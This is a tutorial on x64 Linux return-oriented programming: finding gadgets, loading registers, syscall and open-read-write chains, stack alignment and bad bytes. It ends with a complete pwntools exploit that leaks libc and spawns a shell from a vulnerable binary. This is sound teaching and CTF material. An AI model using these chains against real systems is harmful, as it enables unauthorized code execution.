x64 ROP Chains: Systematic Gadget Hunting
Building ROP chains on x64 Linux - finding gadgets with ropper, handling calling conventions, chaining syscalls, dealing with bad characters, stack alignment, and a complete worked example.
Why x64 ROP Is Different from x86 ROP
Three things change everything when moving from 32-bit to 64-bit ROP:
- Register-based calling convention: x86 cdecl pushed every argument on the stack, so a chain that called system("/bin/sh") was mechanically [&system, junk_return, &"/bin/sh"]. On x64 the first six arguments live in registers, so the chain has to load registers first.
- Address space size: every gadget address is now 8 bytes, the upper bytes of which are usually \x00. If your overflow uses strcpy/strcat/sprintf (anything null-terminated), addresses containing null bytes are unusable mid-chain.
- Stack alignment: the System V ABI mandates 16-byte RSP alignment immediately before a call instruction. SSE-using libc functions (printf, system) crash on movaps if you violate this.
This post is a systematic walkthrough of how to build chains that survive all three.
x64 Calling Convention
On Linux x64, the first 6 arguments go in registers: rdi, rsi, rdx, rcx, r8, r9. A ROP chain must load these registers via pop; ret gadgets before calling the target function.
| Argument | Register | Typical use |
|---|---|---|
| 1 | rdi | first pointer/value |
| 2 | rsi | second pointer/value |
| 3 | rdx | third pointer/value (also read/write count) |
| 4 | rcx | fourth pointer/value (note: syscalls clobber rcx - use r10 for syscall arg 4 instead) |
| 5 | r8 | fifth pointer/value |
| 6 | r9 | sixth pointer/value |
Return value lands in rax. Floating-point arguments use xmm0..xmm7 (rare in exploit work). For variadic functions like printf, al must hold an upper bound on the number of vector registers used (0 for plain ROP chains).
Why Registers Make Life Harder
For system("/bin/sh") you need exactly one register (rdi) loaded with a pointer to /bin/sh. For execve("/bin/sh", argv, envp) via syscall you need three argument registers (rdi, rsi, rdx) plus rax = 59 - and any syscall with a fourth argument needs r10, not rcx. Each register requires a pop reg; ret gadget, and the wider you go, the harder it is to find clean ones.
Finding Gadgets
ropper --file vuln --search "pop rdi"
ropper --file vuln --search "pop rsi; pop r15"
ropper --file vuln --search "ret" # for stack alignment
ropper and ROPgadget are the two standards. Both walk the executable sections, scan backwards from every ret/jmp reg/call reg for byte sequences that decode as valid x64 instructions, and emit a list. Use either; pwntools' ROP() class also ships its own gadget finder.
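As a toy illustration of that scan (the core idea only, not what these tools actually ship): walk the bytes, and at every 0xc3 (ret) opcode, collect the byte windows ending there as gadget candidates. Real tools additionally disassemble each candidate and keep only valid instruction sequences.

```python
def find_ret_candidates(code: bytes, max_back: int = 8):
    """Collect byte windows ending at each 0xc3 (ret) byte.
    A real gadget finder would also disassemble each window and
    discard ones that don't decode to valid x64 instructions."""
    out = []
    for i, b in enumerate(code):
        if b == 0xc3:                       # ret opcode
            for back in range(1, max_back + 1):
                if i - back >= 0:
                    out.append((i - back, code[i - back:i + 1]))
    return out

# 'pop rdi; ret' is the byte pair 5f c3
blob = b'\x90\x5f\xc3'
find_ret_candidates(blob, max_back=2)
# offset 1 yields b'\x5f\xc3' - a pop rdi; ret gadget
```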
Useful Search Patterns
# Direct register loaders
ropper -f vuln --search 'pop rdi; ret'
ropper -f vuln --search 'pop rsi; ret'
ropper -f vuln --search 'pop rdx; ret'
# Two-register / multi-register variants when single ones don't exist
ropper -f vuln --search 'pop rsi; pop r15; ret' # very common
ropper -f vuln --search 'pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret'
# Syscall / direct syscall
ropper -f vuln --search 'syscall'
ropper -f vuln --search 'syscall; ret'
# Memory-write primitives
ropper -f vuln --search 'mov qword ptr [rdi], rsi; ret' # arbitrary 8-byte write
ropper -f vuln --search 'xchg rax, rsp' # stack pivot
# Alignment
ropper -f vuln --search 'ret' # any clean ret
# Static binaries - search libc bundled into the ELF
ROPgadget --binary vuln | grep ': pop rdx'
Where to Search When the Binary Is Sparse
Small statically-linked, stripped binaries sometimes have no pop rdx; ret at all. Sources of additional gadgets:
| Source | When available |
|---|---|
| libc.so.6 (after libc leak) | Dynamic binary; libc gadgets usable after a stage-1 leak |
| ld-linux-x86-64.so.2 | Always loaded; small but contains a few useful pop-r* / syscall gadgets |
| vsyscall page (0xffffffffff600000) | Only on older kernels; contains a few fixed syscall entry points |
| Existing functions used "in the middle" | A function epilogue (add rsp, X; pop r12; pop r13; pop rbp; ret) often serves as a multi-pop gadget |
| __libc_csu_init (pre-glibc-2.34) | The universal gadget - a 6-pop epilogue that loads rbx, rbp, and r12-r15 in one shot |
The “csu_init Universal Gadget”
In binaries linked against glibc < 2.34, __libc_csu_init ends with a stylised epilogue that ROP chains love:
__libc_csu_init+90: pop rbx
__libc_csu_init+91: pop rbp
__libc_csu_init+92: pop r12
__libc_csu_init+94: pop r13
__libc_csu_init+96: pop r14
__libc_csu_init+98: pop r15
__libc_csu_init+100: ret
__libc_csu_init+74: mov rdx, r15
__libc_csu_init+77: mov rsi, r14
__libc_csu_init+80: mov edi, r13d
__libc_csu_init+83: call qword ptr [r12 + rbx*8]
A two-stage chain: first hit +90 to load all six registers (set rbx = 0 and rbp = 1 so the post-call add rbx, 1; cmp rbp, rbx check falls through); then jump to +74 to move them into rdx, rsi, edi and call [r12+rbx*8]. This solves the "no pop rdx; ret exists" problem on most pre-2.34 binaries.
In glibc 2.34+, __libc_csu_init has been removed (the init code is part of _start instead) - search elsewhere.
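The resulting chain layout can be sketched in plain Python (struct only; every address below is a hypothetical placeholder - pull the real offsets from your target binary):

```python
import struct
p64 = lambda v: struct.pack('<Q', v)

# Hypothetical addresses - read the real ones out of the target binary
CSU_POP  = 0x40129a   # __libc_csu_init+90 (the 6-pop epilogue)
CSU_MOV  = 0x401280   # __libc_csu_init+74 (mov rdx/rsi/edi; call [r12+rbx*8])
FUNC_PTR = 0x404018   # writable slot holding a pointer to the target function
NEXT     = 0x401000   # where to continue once the epilogue runs again

chain  = p64(CSU_POP)
chain += p64(0)         # rbx = 0  -> call [r12 + 0*8]
chain += p64(1)         # rbp = 1  -> 'add rbx,1; cmp rbp,rbx' falls through
chain += p64(FUNC_PTR)  # r12 -> pointer to the function pointer
chain += p64(0xdead)    # r13 -> edi  (arg 1, truncated to 32 bits)
chain += p64(0xbeef)    # r14 -> rsi  (arg 2)
chain += p64(0xcafe)    # r15 -> rdx  (arg 3)
chain += p64(CSU_MOV)
chain += p64(0) * 7     # 'add rsp, 8' plus the six pops run a second time
chain += p64(NEXT)
```

Note the seven junk qwords after CSU_MOV: when the check falls through, the add rsp, 8 and the six pops of the epilogue execute again before the final ret reaches NEXT.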
Common x64 ROP Pattern
rop = b""
rop += p64(pop_rdi) # pop rdi; ret
rop += p64(bin_sh_addr) # "/bin/sh" string address
rop += p64(ret) # stack alignment (16-byte)
rop += p64(system_addr) # system()
This is the canonical “you have a libc leak” payload. The ret between the argument loader and the call to system exists for one purpose only - adding 8 bytes to RSP so that by the time system’s prologue executes its movaps, RSP is 16-aligned.
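Concretely, with hypothetical addresses and a 72-byte overflow offset, the payload bytes lay out like this (plain struct, no pwntools required):

```python
import struct
p64 = lambda v: struct.pack('<Q', v)

# Hypothetical addresses for illustration only
pop_rdi = 0x401263          # pop rdi; ret
ret     = 0x40101a          # bare ret, for alignment
bin_sh  = 0x7ffff7f5d698    # "/bin/sh" inside libc
system  = 0x7ffff7e18490    # system() inside libc

payload  = b'A' * 72        # buffer + saved RBP (offset is target-specific)
payload += p64(pop_rdi) + p64(bin_sh)
payload += p64(ret)         # adds 8 to RSP so system() sees correct alignment
payload += p64(system)
```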
When You Need More Than Three Lines
A real chain is rarely this clean. Practical considerations:
rop = p64(pop_rdi) + p64(elf.got['puts']) # arg1 = puts@got
rop += p64(plt_puts) # call puts(puts@got) → leak libc
rop += p64(elf.symbols['main']) # return to main, restart with libc base known
# After receiving the leak, build chain 2 with libc.address resolved
rop2 = p64(pop_rdi) + p64(libc_binsh)
rop2 += p64(ret_align)
rop2 += p64(libc.symbols['system'])
Syscall ROP Chain
For a direct execve syscall:
rop = p64(pop_rax) + p64(59) # syscall number for execve
rop += p64(pop_rdi) + p64(bin_sh) # filename = "/bin/sh"
rop += p64(pop_rsi) + p64(0) # argv = NULL
rop += p64(pop_rdx) + p64(0) # envp = NULL
rop += p64(syscall_ret) # syscall; ret
Linux x64 Syscall ABI (vs. function call)
This catches people every time. Function calls use rcx for arg 4. Syscalls use r10 for arg 4 because the syscall instruction itself clobbers rcx (the CPU saves the return RIP in rcx and RFLAGS in r11 for sysret). The common syscalls and their numbers:
| # | Name | Args |
|---|---|---|
| 0 | read | rdi=fd, rsi=buf, rdx=count |
| 1 | write | rdi=fd, rsi=buf, rdx=count |
| 2 | open | rdi=pathname, rsi=flags, rdx=mode |
| 10 | mprotect | rdi=addr, rsi=len, rdx=prot |
| 59 | execve | rdi=pathname, rsi=argv, rdx=envp |
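The mapping can be made mechanical with a tiny helper - positional arguments onto the syscall register order, with r10 in slot 4 (the helper and its name are illustrative, not a standard API):

```python
SYSCALL_REGS = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']  # r10, not rcx!

def syscall_plan(number, args):
    """Return the register assignment for a syscall as a dict."""
    plan = {'rax': number}
    plan.update(zip(SYSCALL_REGS, args))
    return plan

syscall_plan(59, ['&"/bin/sh"', 0, 0])
# {'rax': 59, 'rdi': '&"/bin/sh"', 'rsi': 0, 'rdx': 0}
```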
When system Is Off-Limits
Sandboxed CTF binaries frequently seccomp away execve (and fork, clone, etc.), forcing an “open-read-write” chain (ORW):
rop = p64(pop_rdi) + p64(flag_path)
rop += p64(pop_rsi) + p64(0) # O_RDONLY
rop += p64(pop_rax) + p64(2) # SYS_open
rop += p64(syscall_ret) # rax = fd
rop += p64(pop_rdi) + p64(3) # fd (assume 3)
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(0) # SYS_read
rop += p64(syscall_ret)
rop += p64(pop_rdi) + p64(1) # stdout
rop += p64(pop_rsi) + p64(buf)
rop += p64(pop_rdx) + p64(0x100)
rop += p64(pop_rax) + p64(1) # SYS_write
rop += p64(syscall_ret)
Stack Alignment
System V ABI requires 16-byte stack alignment before call. If your chain crashes in system() or printf(), insert an extra ret gadget.
Diagnosing the Crash
The fingerprint of a stack-alignment crash is unmistakable:
gdb-peda$ x/i $rip
=> 0x7f9...: movaps XMMWORD PTR [rsp+0x50], xmm0
gdb-peda$ p/x $rsp & 0xf
$1 = 0x8 ← off by 8, classic alignment bug
movaps and movdqa require 16-byte aligned operands; an unaligned access raises SIGSEGV. The fix is to ensure RSP & 0xf == 0 immediately before the call, which means immediately after the previous ret, RSP must be 0x...8 (the ret itself pops 8 bytes).
The 8-Byte Rule
After every ret in your chain, RSP advances by 8. If your initial overflow leaves RSP at a known offset, count ret instructions:
- Even number of pops between calls → alignment preserved.
- Odd number → off by 8; insert a single ret gadget to fix.
In practice, a single bare ret between the last argument-loader and the function call solves 99% of crashes.
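The bookkeeping above can be sketched as a tiny helper (RET_GADGET is a hypothetical bare-ret address; the chain is a list of qwords ending in the function address):

```python
RET_GADGET = 0x40101a   # hypothetical bare 'ret' gadget

def pad_for_alignment(chain, rsp_at_chain_start):
    """Insert one bare ret before the final function address if the
    function would otherwise start on a misaligned stack.
    Each ret pops 8 bytes, so when the function begins executing,
    RSP = rsp_at_chain_start + 8 * len(chain)."""
    rsp_at_entry = rsp_at_chain_start + 8 * len(chain)
    if rsp_at_entry % 16 != 0:
        return chain[:-1] + [RET_GADGET, chain[-1]]
    return chain

# [pop_rdi, binsh, system] starting at a 16-aligned RSP is off by 8:
pad_for_alignment([0x401263, 0x404050, 0x401090], 0x7fffffffe000)
# -> the ret gadget gets spliced in before the system address
```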
Dealing with Bad Characters
If certain bytes (like \x00 or \x0a) are filtered, find alternate gadgets or use add/sub gadget chains to construct addresses without bad bytes.
Common Bad Character Sets
| Source of overflow | Likely banned bytes |
|---|---|
| gets, fgets | \x0a (newline) |
| read from network | usually none; full 8-bit clean |
| strcpy, strcat | \x00 |
| scanf("%s", ...) | whitespace: \x09 \x0a \x0b \x0c \x0d \x20 |
| recv followed by strncpy | \x00 |
Any address ending in \x00 (very common, since the upper bytes of x64 user addresses are \x00\x00) is unusable mid-chain when null-bytes are forbidden - except as the last 8 bytes of the payload.
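Checking a chain for banned bytes before sending it saves a lot of head-scratching - a three-line filter (illustrative helper, not part of any tool):

```python
import struct

def bad_bytes_in(addr, banned=frozenset({0x00, 0x0a})):
    """Return the banned bytes present in the 8-byte LE encoding of addr."""
    return {b for b in struct.pack('<Q', addr) if b in banned}

bad_bytes_in(0x401234)              # {0} - five trailing null bytes
bad_bytes_in(0x7ffff7e18490)        # {0} - the two high bytes are null
bad_bytes_in(0x4142434445464748)    # set() - clean
```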
Building Bad-Byte-Free Addresses
If you need address 0x401234 but \x00 is banned, two tactics:
- Compute via arithmetic gadgets - load a null-free value, then subtract a null-free offset (sub_rax_rbx and jmp_rax are placeholder gadget names):
rop = p64(pop_rax) + p64(0x1111111111512345) # 0x401234 + 0x1111111111111111, no null bytes
rop += p64(pop_rbx) + p64(0x1111111111111111) # the offset, also null-free
rop += p64(sub_rax_rbx) # sub rax, rbx; ret → rax = 0x401234
rop += p64(jmp_rax)
- Copy-and-pivot: send the payload past the bad-character filter, use a write gadget to copy it into a clean writable region (.bss, heap), then pivot the stack into the new region (xchg rsp, rax).
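Finding the null-free pair can be automated - a brute-force sketch that tries repeated-byte offsets until both halves encode cleanly (illustrative; assumes you have a sub rax, rbx; ret-style gadget to consume the pair):

```python
import struct

def null_free_pair(target):
    """Find (a, b) with (a - b) mod 2**64 == target and no \\x00 byte
    in either 64-bit little-endian encoding."""
    for fill in range(0x01, 0x100):
        b = int.from_bytes(bytes([fill]) * 8, 'little')
        a = (target + b) & 0xFFFFFFFFFFFFFFFF
        if 0 not in struct.pack('<Q', a) and 0 not in struct.pack('<Q', b):
            return a, b
    raise ValueError('no null-free pair found')

a, b = null_free_pair(0x401234)
# a = 0x0101010101411335, b = 0x0101010101010101 (fill byte 0x01 works here)
```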
Bad Bytes Inside Libc Addresses
After ASLR, libc addresses typically have the form 0x7f???????????? - the leading 0x7f is rarely a problem, but a \x00 anywhere mid-chain stays a problem. The same arithmetic-gadget tricks apply, using the base computed from the stage-1 leak.
Worked Example: Tying It All Together
from pwn import *
context.binary = elf = ELF('./vuln')   # sets context.arch so asm() emits x64
libc = ELF('./libc.so.6')
io = process('./vuln')
# ---- Gadgets in the binary ----
pop_rdi = next(elf.search(asm('pop rdi; ret'), executable=True))
ret_g = next(elf.search(asm('ret'), executable=True))
# ---- Stage 1: leak libc through puts ----
chain1 = b'A' * 0x40 + b'B' * 8 # buffer + saved RBP
chain1 += p64(pop_rdi) + p64(elf.got['puts'])
chain1 += p64(elf.plt['puts'])
chain1 += p64(elf.symbols['main'])
io.sendlineafter(b'> ', chain1)
leak = u64(io.recv(6).ljust(8, b'\x00'))   # low 6 bytes of the leaked puts address
libc.address = leak - libc.symbols['puts']
log.success(f'libc base = {hex(libc.address)}')
# ---- Stage 2: execve("/bin/sh", 0, 0) via direct syscall ----
pop_rax = libc.address + 0x000000000003a738 # pop rax; ret (offsets below are libc-build-specific)
pop_rsi = libc.address + 0x000000000002601f # pop rsi; ret
pop_rdx = libc.address + 0x0000000000142c92 # pop rdx; ret
syscall_ret = libc.address + 0x0000000000091316 # syscall; ret
binsh = next(libc.search(b'/bin/sh\x00'))
chain2 = b'A' * 0x40 + b'B' * 8
chain2 += p64(pop_rax) + p64(0x3b) # SYS_execve
chain2 += p64(pop_rdi) + p64(binsh)
chain2 += p64(pop_rsi) + p64(0)
chain2 += p64(pop_rdx) + p64(0)
chain2 += p64(ret_g) # padding ret (syscall itself has no 16-byte alignment requirement)
chain2 += p64(syscall_ret)
io.sendlineafter(b'> ', chain2)
io.interactive()
A Few More Tactics Worth Knowing
- SROP (Sigreturn-Oriented Programming): forge a sigcontext on the stack, then return into a sigreturn syscall. One gadget loads every register at once. Useful when conventional pop reg; ret gadgets are scarce.
- JOP/COP: when ret instructions are restricted (rare on Linux, common in some embedded/Windows-CFG-protected binaries), use jmp reg or call reg chains instead.
- mprotect + shellcode: make a writable region executable, copy shellcode in, jump to it. Lets you escape ROP entirely once you have the primitive.
- Stack pivot: xchg rsp, rax, mov rsp, rbp; pop rbp; ret, leave; ret - pivot RSP into a controlled region (e.g. .bss, the heap, or anywhere your input was copied).
- CET / Shadow Stack mitigations: Intel CET enforces a parallel shadow stack - every ret checks the saved return address against the shadow copy, so pure ROP fails. JOP/COP and SROP avoid ret and sidestep the shadow stack (though CET's Indirect Branch Tracking targets indirect jumps and calls in turn).
Master the x64 calling convention and you can build a ROP chain for any binary. The rest is just finding the right gadgets - and the discipline to keep RSP aligned.